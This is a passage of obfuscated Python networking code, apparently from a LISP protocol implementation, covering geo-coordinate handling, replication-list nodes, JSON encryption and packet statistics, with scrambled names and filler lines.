self . lat_mins = 0
self . lat_secs = 0
self . longitude = 0xffffffff
self . long_mins = 0
self . long_secs = 0
self . altitude = - 1
self . radius = 0
if 9 - 9: I11i % OoO0O00 . oO0o / I1ii11iIi11i
if 88 - 88: Oo0Ooo / IiII / II111iiii / I1ii11iIi11i + OoooooooOO
def copy_geo ( self ) :
Ooo0O00o00 = lisp_geo ( self . geo_name )
Ooo0O00o00 . latitude = self . latitude
Ooo0O00o00 . lat_mins = self . lat_mins
Ooo0O00o00 . lat_secs = self . lat_secs
Ooo0O00o00 . longitude = self . longitude
Ooo0O00o00 . long_mins = self . long_mins
Ooo0O00o00 . long_secs = self . long_secs
Ooo0O00o00 . altitude = self . altitude
Ooo0O00o00 . radius = self . radius
return ( Ooo0O00o00 )
if 65 - 65: iII111i % oO0o * IiII
if 16 - 16: iII111i % I11i % OoOoOO00
def no_geo_altitude ( self ) :
return ( self . altitude == - 1 )
if 80 - 80: OoooooooOO * i11iIiiIii % oO0o / Oo0Ooo - I1ii11iIi11i
if 92 - 92: o0oOOo0O0Ooo % i1IIi / I1Ii111 % ooOoO0o / oO0o
def parse_geo_string ( self , geo_str ) :
OOOooo0OooOoO = geo_str . find ( "]" )
if ( OOOooo0OooOoO != - 1 ) : geo_str = geo_str [ OOOooo0OooOoO + 1 : : ]
if 2 - 2: i11iIiiIii / Ii1I - i1IIi % O0
if 12 - 12: Oo0Ooo + I1ii11iIi11i
if 54 - 54: OoO0O00 . o0oOOo0O0Ooo / I11i
if 95 - 95: i1IIi . I1Ii111
if 94 - 94: I1IiiI + Ii1I + i1IIi . iIii1I11I1II1
if ( geo_str . find ( "/" ) != - 1 ) :
geo_str , Oo0OOoO0oo0oO = geo_str . split ( "/" )
self . radius = int ( Oo0OOoO0oo0oO )
if 31 - 31: iIii1I11I1II1 + I1IiiI
if 82 - 82: I1Ii111 / Ii1I % OoooooooOO - IiII / OoooooooOO
geo_str = geo_str . split ( "-" )
if ( len ( geo_str ) < 8 ) : return ( False )
if 23 - 23: iIii1I11I1II1
I1I1 = geo_str [ 0 : 4 ]
iiiI1ioo = geo_str [ 4 : 8 ]
if 36 - 36: i11iIiiIii - I1IiiI
if 69 - 69: i1IIi
if 52 - 52: OoOoOO00 + II111iiii % I1ii11iIi11i - II111iiii / ooOoO0o
if 54 - 54: I1Ii111 - I11i * iIii1I11I1II1 % OoO0O00 % I11i * ooOoO0o
if ( len ( geo_str ) > 8 ) : self . altitude = int ( geo_str [ 8 ] )
if 10 - 10: OoooooooOO / I11i
if 48 - 48: I1IiiI % Ii1I
if 76 - 76: o0oOOo0O0Ooo / iIii1I11I1II1 * IiII
if 36 - 36: ooOoO0o - OoOoOO00 . iIii1I11I1II1 / oO0o % OoooooooOO * iII111i
self . latitude = int ( I1I1 [ 0 ] )
self . lat_mins = int ( I1I1 [ 1 ] )
self . lat_secs = int ( I1I1 [ 2 ] )
if ( I1I1 [ 3 ] == "N" ) : self . latitude = - self . latitude
if 42 - 42: oO0o
if 71 - 71: i11iIiiIii . I1Ii111 % OoO0O00 % I1IiiI
if 46 - 46: IiII + oO0o - ooOoO0o
if 2 - 2: i1IIi / Ii1I % OoO0O00
self . longitude = int ( iiiI1ioo [ 0 ] )
self . long_mins = int ( iiiI1ioo [ 1 ] )
self . long_secs = int ( iiiI1ioo [ 2 ] )
if ( iiiI1ioo [ 3 ] == "E" ) : self . longitude = - self . longitude
return ( True )
if 85 - 85: i1IIi % iIii1I11I1II1
if 10 - 10: O0 . oO0o * I1IiiI
def print_geo ( self ) :
i1I1 = "N" if self . latitude < 0 else "S"
iIOO0OOOo = "E" if self . longitude < 0 else "W"
if 15 - 15: II111iiii - iII111i / I1ii11iIi11i
oOIIi = "{}-{}-{}-{}-{}-{}-{}-{}" . format ( abs ( self . latitude ) ,
self . lat_mins , self . lat_secs , i1I1 , abs ( self . longitude ) ,
self . long_mins , self . long_secs , iIOO0OOOo )
if 81 - 81: Ii1I - i1IIi % oO0o * Oo0Ooo * OoOoOO00
if ( self . no_geo_altitude ( ) == False ) :
oOIIi += "-" + str ( self . altitude )
if 79 - 79: oO0o + I1IiiI % iII111i + II111iiii % OoO0O00 % iII111i
if 46 - 46: o0oOOo0O0Ooo
if 61 - 61: OoO0O00 . O0 + I1ii11iIi11i + OoO0O00
if 44 - 44: I11i . oO0o
if 65 - 65: I1ii11iIi11i * II111iiii % I11i + II111iiii . i1IIi / ooOoO0o
if ( self . radius != 0 ) : oOIIi += "/{}" . format ( self . radius )
return ( oOIIi )
if 74 - 74: OoOoOO00 % OoO0O00 . OoOoOO00
if 16 - 16: OoO0O00 / Ii1I * i11iIiiIii / o0oOOo0O0Ooo + I1Ii111
def geo_url ( self ) :
i1IiI1IIIIi = os . getenv ( "LISP_GEO_ZOOM_LEVEL" )
i1IiI1IIIIi = "10" if ( i1IiI1IIIIi == "" or i1IiI1IIIIi . isdigit ( ) == False ) else i1IiI1IIIIi
ooOO0OOo0oo0 , Oo0OO0o = self . dms_to_decimal ( )
I11II = ( "http://maps.googleapis.com/maps/api/staticmap?center={},{}" + "&markers=color:blue%7Clabel:lisp%7C{},{}" + "&zoom={}&size=1024x1024&sensor=false" ) . format ( ooOO0OOo0oo0 , Oo0OO0o , ooOO0OOo0oo0 , Oo0OO0o ,
# ooOoO0o + O0 * IiII * I11i * i11iIiiIii - OoO0O00
# Oo0Ooo . Oo0Ooo * IiII - OoOoOO00 % i1IIi % Oo0Ooo
i1IiI1IIIIi )
return ( I11II )
if 24 - 24: OoO0O00 + iII111i . Oo0Ooo
if 2 - 2: I1ii11iIi11i
def print_geo_url ( self ) :
Ooo0O00o00 = self . print_geo ( )
if ( self . radius == 0 ) :
I11II = self . geo_url ( )
i1i111III1 = "<a href='{}'>{}</a>" . format ( I11II , Ooo0O00o00 )
else :
I11II = Ooo0O00o00 . replace ( "/" , "-" )
i1i111III1 = "<a href='/lisp/geo-map/{}'>{}</a>" . format ( I11II , Ooo0O00o00 )
if 12 - 12: Ii1I - I1ii11iIi11i
return ( i1i111III1 )
if 10 - 10: Ii1I * i11iIiiIii - ooOoO0o
if 65 - 65: OoOoOO00 * I1ii11iIi11i - I11i - OOooOOo
def dms_to_decimal ( self ) :
I1Ii1I , Ii1ii1I1 , iIIIiI11ii = self . latitude , self . lat_mins , self . lat_secs
oo00OoOo00o = float ( abs ( I1Ii1I ) )
oo00OoOo00o += float ( Ii1ii1I1 * 60 + iIIIiI11ii ) / 3600
if ( I1Ii1I > 0 ) : oo00OoOo00o = - oo00OoOo00o
iI1iI1I1 = oo00OoOo00o
if 96 - 96: IiII % iII111i . OoOoOO00 / oO0o . OoO0O00
I1Ii1I , Ii1ii1I1 , iIIIiI11ii = self . longitude , self . long_mins , self . long_secs
oo00OoOo00o = float ( abs ( I1Ii1I ) )
oo00OoOo00o += float ( Ii1ii1I1 * 60 + iIIIiI11ii ) / 3600
if ( I1Ii1I > 0 ) : oo00OoOo00o = - oo00OoOo00o
oo0OO = oo00OoOo00o
return ( ( iI1iI1I1 , oo0OO ) )
if 26 - 26: iII111i - OoO0O00 . o0oOOo0O0Ooo
if 50 - 50: I1Ii111 . O0 . OoOoOO00 + I1Ii111 + OoooooooOO . i11iIiiIii
def get_distance ( self , geo_point ) :
oooOoOoooo = self . dms_to_decimal ( )
iiIi1iI1Ii = geo_point . dms_to_decimal ( )
i1iI = geopy . distance . distance ( oooOoOoooo , iiIi1iI1Ii )
return ( i1iI . km )
if 33 - 33: Oo0Ooo + OoO0O00
if 62 - 62: oO0o / I1IiiI
def point_in_circle ( self , geo_point ) :
Oo00 = self . get_distance ( geo_point )
return ( Oo00 <= self . radius )
if 38 - 38: ooOoO0o . OoooooooOO - II111iiii * i11iIiiIii / i1IIi . OoooooooOO
if 51 - 51: oO0o - I1ii11iIi11i + I1ii11iIi11i
def encode_geo ( self ) :
ii1 = socket . htons ( LISP_AFI_LCAF )
Iii = socket . htons ( 20 + 2 )
Ooo0000o = 0
if 100 - 100: I11i - I1ii11iIi11i . i1IIi
ooOO0OOo0oo0 = abs ( self . latitude )
oOOOo = ( ( self . lat_mins * 60 ) + self . lat_secs ) * 1000
if ( self . latitude < 0 ) : Ooo0000o |= 0x40
if 43 - 43: O0 * I11i * IiII
Oo0OO0o = abs ( self . longitude )
iiiII1Iii11i1 = ( ( self . long_mins * 60 ) + self . long_secs ) * 1000
if ( self . longitude < 0 ) : Ooo0000o |= 0x20
if 51 - 51: I11i + OoooooooOO / OoOoOO00 * i1IIi * I11i
IiI1ii1 = 0
if ( self . no_geo_altitude ( ) == False ) :
IiI1ii1 = socket . htonl ( self . altitude )
Ooo0000o |= 0x10
if 82 - 82: I1Ii111
Oo0OOoO0oo0oO = socket . htons ( self . radius )
if ( Oo0OOoO0oo0oO != 0 ) : Ooo0000o |= 0x06
if 78 - 78: I1Ii111 % oO0o * iIii1I11I1II1
iii = struct . pack ( "HBBBBH" , ii1 , 0 , 0 , LISP_LCAF_GEO_COORD_TYPE ,
0 , Iii )
iii += struct . pack ( "BBHBBHBBHIHHH" , Ooo0000o , 0 , 0 , ooOO0OOo0oo0 , oOOOo >> 16 ,
socket . htons ( oOOOo & 0x0ffff ) , Oo0OO0o , iiiII1Iii11i1 >> 16 ,
socket . htons ( iiiII1Iii11i1 & 0xffff ) , IiI1ii1 , Oo0OOoO0oo0oO , 0 , 0 )
if 2 - 2: OOooOOo % Oo0Ooo * OOooOOo + I1Ii111 % OoOoOO00 / O0
return ( iii )
if 23 - 23: O0 * oO0o / I1IiiI + i1IIi * O0 % oO0o
if 11 - 11: I1Ii111 . OoooooooOO * iIii1I11I1II1 / I1ii11iIi11i - ooOoO0o . iII111i
def decode_geo ( self , packet , lcaf_len , radius_hi ) :
iiII1iiI = "BBHBBHBBHIHHH"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( lcaf_len < ooo0000oo0 ) : return ( None )
if 71 - 71: i11iIiiIii + I11i / i11iIiiIii % Oo0Ooo / iIii1I11I1II1 * OoO0O00
Ooo0000o , i1Iii1 , i1111111II , ooOO0OOo0oo0 , ooooo0o0 , oOOOo , Oo0OO0o , oO0OOoOOo , iiiII1Iii11i1 , IiI1ii1 , Oo0OOoO0oo0oO , i1I11III , i1I1iiiI = struct . unpack ( iiII1iiI ,
# iIii1I11I1II1 % i11iIiiIii * I1Ii111
packet [ : ooo0000oo0 ] )
if 48 - 48: I11i * OoO0O00 - OoO0O00
if 88 - 88: I11i * iII111i . I1Ii111 * IiII - I1Ii111
if 79 - 79: iIii1I11I1II1
if 4 - 4: i1IIi % iIii1I11I1II1 + Oo0Ooo + OOooOOo % oO0o
i1I1iiiI = socket . ntohs ( i1I1iiiI )
if ( i1I1iiiI == LISP_AFI_LCAF ) : return ( None )
if 76 - 76: ooOoO0o . iII111i
if ( Ooo0000o & 0x40 ) : ooOO0OOo0oo0 = - ooOO0OOo0oo0
self . latitude = ooOO0OOo0oo0
OOoooOooOO = old_div ( ( ( ooooo0o0 << 16 ) | socket . ntohs ( oOOOo ) ) , 1000 )
self . lat_mins = old_div ( OOoooOooOO , 60 )
self . lat_secs = OOoooOooOO % 60
if 69 - 69: i11iIiiIii * I1IiiI - o0oOOo0O0Ooo
if ( Ooo0000o & 0x20 ) : Oo0OO0o = - Oo0OO0o
self . longitude = Oo0OO0o
O0000Ooo0OO0 = old_div ( ( ( oO0OOoOOo << 16 ) | socket . ntohs ( iiiII1Iii11i1 ) ) , 1000 )
self . long_mins = old_div ( O0000Ooo0OO0 , 60 )
self . long_secs = O0000Ooo0OO0 % 60
if 58 - 58: o0oOOo0O0Ooo - IiII
self . altitude = socket . ntohl ( IiI1ii1 ) if ( Ooo0000o & 0x10 ) else - 1
Oo0OOoO0oo0oO = socket . ntohs ( Oo0OOoO0oo0oO )
self . radius = Oo0OOoO0oo0oO if ( Ooo0000o & 0x02 ) else Oo0OOoO0oo0oO * 1000
if 77 - 77: iIii1I11I1II1 + Ii1I + oO0o . i11iIiiIii - iIii1I11I1II1 % ooOoO0o
self . geo_name = None
packet = packet [ ooo0000oo0 : : ]
if 53 - 53: i11iIiiIii / OoOoOO00 % o0oOOo0O0Ooo / IiII
if ( i1I1iiiI != 0 ) :
self . rloc . afi = i1I1iiiI
packet = self . rloc . unpack_address ( packet )
self . rloc . mask_len = self . rloc . host_mask_len ( )
if 88 - 88: ooOoO0o . i1IIi
return ( packet )
if 21 - 21: OoO0O00 * I1ii11iIi11i + I1ii11iIi11i
if 36 - 36: Ii1I . OOooOOo * iIii1I11I1II1 - i1IIi
if 38 - 38: Oo0Ooo . o0oOOo0O0Ooo % oO0o / i11iIiiIii * OoO0O00 % OoOoOO00
if 18 - 18: OOooOOo
if 12 - 12: I1Ii111 % II111iiii / o0oOOo0O0Ooo - iIii1I11I1II1 + II111iiii
if 41 - 41: OOooOOo
class lisp_rle_node ( object ) :
def __init__ ( self ) :
self . address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . level = 0
self . translated_port = 0
self . rloc_name = None
if 8 - 8: i11iIiiIii . IiII . I1ii11iIi11i + i1IIi % I1Ii111
if 64 - 64: I1IiiI . Oo0Ooo * OoO0O00
def copy_rle_node ( self ) :
iIIi = lisp_rle_node ( )
iIIi . address . copy_address ( self . address )
iIIi . level = self . level
iIIi . translated_port = self . translated_port
iIIi . rloc_name = self . rloc_name
return ( iIIi )
if 87 - 87: i1IIi / OoooooooOO
if 68 - 68: I1Ii111 / iIii1I11I1II1
def store_translated_rloc ( self , rloc , port ) :
self . address . copy_address ( rloc )
self . translated_port = port
if 8 - 8: ooOoO0o * IiII * OOooOOo / I1IiiI
if 40 - 40: i11iIiiIii + OoooooooOO
def get_encap_keys ( self ) :
ooO0 = "4341" if self . translated_port == 0 else str ( self . translated_port )
if 2 - 2: o0oOOo0O0Ooo * OoO0O00
O0O0 = self . address . print_address_no_iid ( ) + ":" + ooO0
if 88 - 88: Oo0Ooo + oO0o + iII111i
try :
iI1iiiiiii = lisp_crypto_keys_by_rloc_encap [ O0O0 ]
if ( iI1iiiiiii [ 1 ] ) : return ( iI1iiiiiii [ 1 ] . encrypt_key , iI1iiiiiii [ 1 ] . icv_key )
return ( None , None )
except :
return ( None , None )
if 51 - 51: i1IIi + i11iIiiIii * I11i / iII111i + OoooooooOO
if 89 - 89: i11iIiiIii - I1Ii111 - O0 % iIii1I11I1II1 / IiII - O0
if 63 - 63: OOooOOo
if 23 - 23: Oo0Ooo / i1IIi - OOooOOo / Oo0Ooo
class lisp_rle ( object ) :
def __init__ ( self , name ) :
self . rle_name = name
self . rle_nodes = [ ]
self . rle_forwarding_list = [ ]
if 16 - 16: o0oOOo0O0Ooo - iIii1I11I1II1 / OoooooooOO / I1ii11iIi11i + IiII
if 73 - 73: OOooOOo % I1Ii111 + OoooooooOO / I1ii11iIi11i * oO0o % oO0o
def copy_rle ( self ) :
ooo0o0O = lisp_rle ( self . rle_name )
for iIIi in self . rle_nodes :
ooo0o0O . rle_nodes . append ( iIIi . copy_rle_node ( ) )
if 25 - 25: I1Ii111
ooo0o0O . build_forwarding_list ( )
return ( ooo0o0O )
if 93 - 93: OoO0O00
if 62 - 62: Oo0Ooo . iII111i
def print_rle ( self , html , do_formatting ) :
IIIi1iI1 = ""
for iIIi in self . rle_nodes :
ooO0 = iIIi . translated_port
if 15 - 15: i11iIiiIii * I11i + oO0o
o0O = ""
if ( iIIi . rloc_name != None ) :
o0O = iIIi . rloc_name
if ( do_formatting ) : o0O = blue ( o0O , html )
o0O = "({})" . format ( o0O )
if 59 - 59: oO0o * o0oOOo0O0Ooo
if 76 - 76: I1IiiI
O0O0 = iIIi . address . print_address_no_iid ( )
if ( iIIi . address . is_local ( ) ) : O0O0 = red ( O0O0 , html )
IIIi1iI1 += "{}{}{}, " . format ( O0O0 , "" if ooO0 == 0 else ":" + str ( ooO0 ) , o0O )
if 94 - 94: OoooooooOO * I1ii11iIi11i
if 28 - 28: II111iiii / II111iiii / II111iiii
return ( IIIi1iI1 [ 0 : - 2 ] if IIIi1iI1 != "" else "" )
if 70 - 70: OoO0O00 + O0 * OoO0O00
if 25 - 25: OoooooooOO . Oo0Ooo + OOooOOo + Oo0Ooo * O0 % i1IIi
def build_forwarding_list ( self ) :
ii11i = - 1
for iIIi in self . rle_nodes :
if ( ii11i == - 1 ) :
if ( iIIi . address . is_local ( ) ) : ii11i = iIIi . level
else :
if ( iIIi . level > ii11i ) : break
if 71 - 71: II111iiii / Ii1I + i1IIi - OoOoOO00 + Ii1I
if 31 - 31: OoooooooOO * Ii1I - iII111i . oO0o % Ii1I
ii11i = 0 if ii11i == - 1 else iIIi . level
if 97 - 97: Ii1I
self . rle_forwarding_list = [ ]
for iIIi in self . rle_nodes :
if ( iIIi . level == ii11i or ( ii11i == 0 and
iIIi . level == 128 ) ) :
if ( lisp_i_am_rtr == False and iIIi . address . is_local ( ) ) :
O0O0 = iIIi . address . print_address_no_iid ( )
lprint ( "Exclude local RLE RLOC {}" . format ( O0O0 ) )
continue
if 51 - 51: II111iiii . oO0o % iII111i
self . rle_forwarding_list . append ( iIIi )
if 47 - 47: II111iiii - iII111i * I1IiiI . IiII
if 41 - 41: OoOoOO00 / O0 + I1Ii111 . I1ii11iIi11i
if 48 - 48: Ii1I . o0oOOo0O0Ooo * O0 / OoooooooOO + I1Ii111 + Oo0Ooo
if 92 - 92: Ii1I - o0oOOo0O0Ooo % I1IiiI + I1Ii111
if 3 - 3: iIii1I11I1II1 + i11iIiiIii
class lisp_json ( object ) :
def __init__ ( self , name , string , encrypted = False , ms_encrypt = False ) :
if 49 - 49: OoOoOO00 % iIii1I11I1II1 + I1Ii111
if 38 - 38: i11iIiiIii
if 75 - 75: iIii1I11I1II1 / OoO0O00 * OOooOOo % O0
if 82 - 82: Oo0Ooo / i1IIi . i1IIi / oO0o
if ( type ( string ) == bytes ) : string = string . decode ( )
if 7 - 7: Oo0Ooo . iII111i % I1ii11iIi11i / iII111i
self . json_name = name
self . json_encrypted = False
try :
json . loads ( string )
except :
lprint ( "Invalid JSON string: '{}'" . format ( string ) )
string = '{ "?" : "?" }'
if 93 - 93: iII111i
self . json_string = string
if 5 - 5: iII111i . I11i % I11i * Ii1I - I1ii11iIi11i . i11iIiiIii
if 32 - 32: II111iiii
if 58 - 58: I1IiiI - o0oOOo0O0Ooo - I1Ii111 . O0 % OoO0O00 . I11i
if 41 - 41: iII111i . I1Ii111 - IiII / O0
if 62 - 62: IiII * I1ii11iIi11i * iII111i * OoOoOO00
if 12 - 12: Oo0Ooo * Ii1I / ooOoO0o % I11i % O0
if 25 - 25: Oo0Ooo * oO0o
if 78 - 78: OoOoOO00 / II111iiii
if 6 - 6: I1Ii111 . OoOoOO00
if 75 - 75: Oo0Ooo + I11i
if ( len ( lisp_ms_json_keys ) != 0 ) :
if ( ms_encrypt == False ) : return
self . json_key_id = list ( lisp_ms_json_keys . keys ( ) ) [ 0 ]
self . json_key = lisp_ms_json_keys [ self . json_key_id ]
self . encrypt_json ( )
if 87 - 87: I1IiiI
if 36 - 36: OoO0O00 . ooOoO0o . O0 / OoO0O00
if ( lisp_log_id == "lig" and encrypted ) :
III = os . getenv ( "LISP_JSON_KEY" )
if ( III != None ) :
OOOooo0OooOoO = - 1
if ( III [ 0 ] == "[" and "]" in III ) :
OOOooo0OooOoO = III . find ( "]" )
self . json_key_id = int ( III [ 1 : OOOooo0OooOoO ] )
if 50 - 50: Ii1I . OoOoOO00 * o0oOOo0O0Ooo
self . json_key = III [ OOOooo0OooOoO + 1 : : ]
if 68 - 68: IiII * oO0o / OoOoOO00 / I1Ii111
self . decrypt_json ( )
if 72 - 72: I1ii11iIi11i
if 74 - 74: I1Ii111 * iIii1I11I1II1 / oO0o - IiII - I1IiiI
if 84 - 84: iIii1I11I1II1 % Oo0Ooo / I1ii11iIi11i + o0oOOo0O0Ooo * II111iiii
if 81 - 81: I1IiiI / I1ii11iIi11i / OOooOOo
def add ( self ) :
self . delete ( )
lisp_json_list [ self . json_name ] = self
if 89 - 89: Oo0Ooo % IiII
if 36 - 36: IiII % OoOoOO00 % I1ii11iIi11i
def delete ( self ) :
if ( self . json_name in lisp_json_list ) :
del ( lisp_json_list [ self . json_name ] )
lisp_json_list [ self . json_name ] = None
if 7 - 7: I1ii11iIi11i % OoOoOO00 - O0 . I1Ii111
if 9 - 9: Ii1I . OoooooooOO / ooOoO0o + i1IIi
if 90 - 90: oO0o - OoOoOO00 % ooOoO0o
def print_json ( self , html ) :
o0OOO0OO = self . json_string
i1ii1ii11iIi = "***"
if ( html ) : i1ii1ii11iIi = red ( i1ii1ii11iIi , html )
O0oOoO0 = i1ii1ii11iIi + self . json_string + i1ii1ii11iIi
if ( self . valid_json ( ) ) : return ( o0OOO0OO )
return ( O0oOoO0 )
if 62 - 62: iIii1I11I1II1 * I1IiiI % iII111i * II111iiii / OoO0O00
if 16 - 16: iIii1I11I1II1
def valid_json ( self ) :
try :
json . loads ( self . json_string )
except :
return ( False )
if 39 - 39: oO0o / OoO0O00 - Ii1I + ooOoO0o + OOooOOo
return ( True )
if 84 - 84: iII111i / Oo0Ooo
if 21 - 21: OoO0O00 . I1IiiI - OoO0O00
def encrypt_json ( self ) :
iiIio0o0 = self . json_key . zfill ( 32 )
OoOooO = "0" * 8
if 51 - 51: iIii1I11I1II1
iIiI11II = json . loads ( self . json_string )
for III in iIiI11II :
oOO0 = iIiI11II [ III ]
if ( type ( oOO0 ) != str ) : oOO0 = str ( oOO0 )
oOO0 = chacha . ChaCha ( iiIio0o0 , OoOooO ) . encrypt ( oOO0 )
iIiI11II [ III ] = binascii . hexlify ( oOO0 )
if 73 - 73: O0 * I1Ii111 - i1IIi
self . json_string = json . dumps ( iIiI11II )
self . json_encrypted = True
if 68 - 68: OOooOOo % IiII / Oo0Ooo + OoOoOO00
if 11 - 11: OoO0O00
def decrypt_json ( self ) :
iiIio0o0 = self . json_key . zfill ( 32 )
OoOooO = "0" * 8
if 70 - 70: o0oOOo0O0Ooo * O0 * II111iiii
iIiI11II = json . loads ( self . json_string )
for III in iIiI11II :
oOO0 = binascii . unhexlify ( iIiI11II [ III ] )
iIiI11II [ III ] = chacha . ChaCha ( iiIio0o0 , OoOooO ) . encrypt ( oOO0 )
if 38 - 38: OoO0O00 - I1IiiI * OoooooooOO / I11i . O0
try :
self . json_string = json . dumps ( iIiI11II )
self . json_encrypted = False
except :
pass
if 77 - 77: OOooOOo + oO0o * iIii1I11I1II1 / oO0o / OOooOOo . i11iIiiIii
if 92 - 92: Oo0Ooo . o0oOOo0O0Ooo % OoooooooOO * i11iIiiIii * OoO0O00 * o0oOOo0O0Ooo
if 48 - 48: iII111i * I1ii11iIi11i * oO0o % O0 . OoO0O00
if 11 - 11: OOooOOo / o0oOOo0O0Ooo
if 98 - 98: oO0o + I11i . oO0o
if 10 - 10: iII111i + i1IIi . I11i % ooOoO0o / ooOoO0o
if 86 - 86: Oo0Ooo
class lisp_stats ( object ) :
def __init__ ( self ) :
self . packet_count = 0
self . byte_count = 0
self . last_rate_check = 0
self . last_packet_count = 0
self . last_byte_count = 0
self . last_increment = None
if 7 - 7: iIii1I11I1II1
if 86 - 86: IiII + iII111i * II111iiii - IiII - o0oOOo0O0Ooo
def increment ( self , octets ) :
self . packet_count += 1
self . byte_count += octets
self . last_increment = lisp_get_timestamp ( )
if 8 - 8: OOooOOo . Ii1I
if 15 - 15: ooOoO0o / OOooOOo + i1IIi / Ii1I / OOooOOo
def recent_packet_sec ( self ) :
if ( self . last_increment == None ) : return ( False )
i1i111Iiiiiii = time . time ( ) - self . last_increment
return ( i1i111Iiiiiii <= 1 )
if 47 - 47: Oo0Ooo + oO0o % OoooooooOO
if 23 - 23: I1Ii111 / i11iIiiIii - ooOoO0o * iII111i - Ii1I . iIii1I11I1II1
def recent_packet_min ( self ) :
if ( self . last_increment == None ) : return ( False )
i1i111Iiiiiii = time . time ( ) - self . last_increment
return ( i1i111Iiiiiii <= 60 )
if 11 - 11: I11i % OoOoOO00 * Oo0Ooo
if 48 - 48: OOooOOo
def stat_colors ( self , c1 , c2 , html ) :
if ( self . recent_packet_sec ( ) ) :
return ( green_last_sec ( c1 ) , green_last_sec ( c2 ) )
if 66 - 66: iII111i - I1Ii111 - i11iIiiIii . o0oOOo0O0Ooo + Oo0Ooo
if ( self . recent_packet_min ( ) ) :
return ( green_last_min ( c1 ) , green_last_min ( c2 ) )
if 90 - 90: O0 - i11iIiiIii * ooOoO0o . I1ii11iIi11i . Ii1I - OoooooooOO
return ( c1 , c2 )
if 23 - 23: o0oOOo0O0Ooo
if 88 - 88: I1Ii111 + iIii1I11I1II1 / o0oOOo0O0Ooo
def normalize ( self , count ) :
count = str ( count )
O0Ooo0O00O = len ( count )
if ( O0Ooo0O00O > 12 ) :
count = count [ 0 : - 10 ] + "." + count [ - 10 : - 7 ] + "T"
return ( count )
if 19 - 19: OOooOOo - II111iiii
if ( O0Ooo0O00O > 9 ) :
count = count [ 0 : - 9 ] + "." + count [ - 9 : - 7 ] + "B"
return ( count )
if 80 - 80: Oo0Ooo % I1Ii111
if ( O0Ooo0O00O > 6 ) :
count = count [ 0 : - 6 ] + "." + count [ - 6 ] + "M"
return ( count )
if 91 - 91: OoooooooOO - O0 . iII111i - II111iiii % O0 - OoooooooOO
return ( count )
if 94 - 94: I1IiiI % I1ii11iIi11i
if 30 - 30: iIii1I11I1II1 . OoOoOO00
def get_stats ( self , summary , html ) :
iIoOo00oOoO = self . last_rate_check
Oo0oo00 = self . last_packet_count
IIIiIIi = self . last_byte_count
self . last_rate_check = lisp_get_timestamp ( )
self . last_packet_count = self . packet_count
self . last_byte_count = self . byte_count
if 89 - 89: OoooooooOO % II111iiii . I1ii11iIi11i + o0oOOo0O0Ooo % I1Ii111 * IiII
o0Ooo00 = self . last_rate_check - iIoOo00oOoO
if ( o0Ooo00 == 0 ) :
iI1iiiiiiiiI = 0
o0o0O0o0000 = 0
else :
iI1iiiiiiiiI = int ( old_div ( ( self . packet_count - Oo0oo00 ) ,
o0Ooo00 ) )
o0o0O0o0000 = old_div ( ( self . byte_count - IIIiIIi ) , o0Ooo00 )
o0o0O0o0000 = old_div ( ( o0o0O0o0000 * 8 ) , 1000000 )
o0o0O0o0000 = round ( o0o0O0o0000 , 2 )
if 81 - 81: O0 . IiII
if 60 - 60: i1IIi + i1IIi
if 47 - 47: iII111i - I1Ii111 - I1Ii111 . ooOoO0o
if 5 - 5: i1IIi
if 47 - 47: I11i * I11i . OoOoOO00
ooOOo0O = self . normalize ( self . packet_count )
i1Ii1iiii1Ii = self . normalize ( self . byte_count )
if 54 - 54: iIii1I11I1II1 % II111iiii - OOooOOo * i1IIi
if 26 - 26: OOooOOo % ooOoO0o
if 80 - 80: o0oOOo0O0Ooo . iII111i . ooOoO0o + OOooOOo * I1IiiI / O0
if 61 - 61: I11i % OOooOOo + i11iIiiIii + I11i
if 69 - 69: OoOoOO00 + OoOoOO00 + o0oOOo0O0Ooo / iIii1I11I1II1 * OoO0O00
if ( summary ) :
iiI1 = "<br>" if html else ""
ooOOo0O , i1Ii1iiii1Ii = self . stat_colors ( ooOOo0O , i1Ii1iiii1Ii , html )
o00o0O0O0oO0o = "packet-count: {}{}byte-count: {}" . format ( ooOOo0O , iiI1 , i1Ii1iiii1Ii )
IIIii1i = "packet-rate: {} pps\nbit-rate: {} Mbps" . format ( iI1iiiiiiiiI , o0o0O0o0000 )
if 56 - 56: ooOoO0o
if ( html != "" ) : IIIii1i = lisp_span ( o00o0O0O0oO0o , IIIii1i )
else :
OoooOOO0OO = str ( iI1iiiiiiiiI )
Iii1I11iIiI1 = str ( o0o0O0o0000 )
if ( html ) :
ooOOo0O = lisp_print_cour ( ooOOo0O )
OoooOOO0OO = lisp_print_cour ( OoooOOO0OO )
i1Ii1iiii1Ii = lisp_print_cour ( i1Ii1iiii1Ii )
Iii1I11iIiI1 = lisp_print_cour ( Iii1I11iIiI1 )
if 100 - 100: I1IiiI
iiI1 = "<br>" if html else ", "
if 27 - 27: OoOoOO00 * O0 - I11i
IIIii1i = ( "packet-count: {}{}packet-rate: {} pps{}byte-count: " + "{}{}bit-rate: {} mbps" ) . format ( ooOOo0O , iiI1 , OoooOOO0OO , iiI1 , i1Ii1iiii1Ii , iiI1 ,
# iII111i % OoooooooOO + Ii1I - OoooooooOO + I1ii11iIi11i - i1IIi
Iii1I11iIiI1 )
if 73 - 73: oO0o / iII111i * I1Ii111 + i1IIi * I1Ii111 / I1Ii111
return ( IIIii1i )
if 75 - 75: iIii1I11I1II1 / OoO0O00 / i1IIi
if 36 - 36: o0oOOo0O0Ooo + I1Ii111 / iII111i
if 48 - 48: I1IiiI % ooOoO0o * o0oOOo0O0Ooo * II111iiii - OoOoOO00
if 12 - 12: I1IiiI - Oo0Ooo / I11i
if 79 - 79: II111iiii . I1Ii111 * I1Ii111 + I11i + I1Ii111 % I1IiiI
if 42 - 42: I11i - i1IIi . Oo0Ooo - i1IIi
if 87 - 87: O0 . o0oOOo0O0Ooo % OOooOOo / I11i - I1Ii111 % i11iIiiIii
if 3 - 3: oO0o + iII111i + OOooOOo
lisp_decap_stats = {
"good-packets" : lisp_stats ( ) , "ICV-error" : lisp_stats ( ) ,
"checksum-error" : lisp_stats ( ) , "lisp-header-error" : lisp_stats ( ) ,
"no-decrypt-key" : lisp_stats ( ) , "bad-inner-version" : lisp_stats ( ) ,
"outer-header-error" : lisp_stats ( )
}
if 54 - 54: i11iIiiIii + OoO0O00 - IiII - iII111i / I11i
if 85 - 85: OOooOOo * OOooOOo * I1Ii111 - ooOoO0o . O0 % iII111i
if 5 - 5: i1IIi * iII111i . o0oOOo0O0Ooo - I1ii11iIi11i
if 84 - 84: i1IIi
